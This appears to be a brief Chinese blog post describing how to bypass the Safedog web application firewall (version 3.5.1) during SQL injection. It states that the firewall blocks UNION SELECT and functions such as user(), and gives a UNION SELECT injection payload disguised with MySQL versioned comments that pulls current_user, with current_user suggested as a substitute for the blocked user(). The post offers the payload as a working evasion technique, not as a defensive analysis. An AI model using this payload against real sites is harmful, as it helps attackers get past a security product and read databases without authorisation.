安全狗的注入绕过
in Technology with 0 comment

安全狗的注入绕过

in Technology with 0 comment

目前测试版本是3.5.1
测试后发安全狗知识拦截了联合select和一些常用的函数

当我们换成:/*!50000select/
虽然过狗,但是查询错误
可以利用/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

最后:User() 是被拦截的,可换成cueernt_user

Responses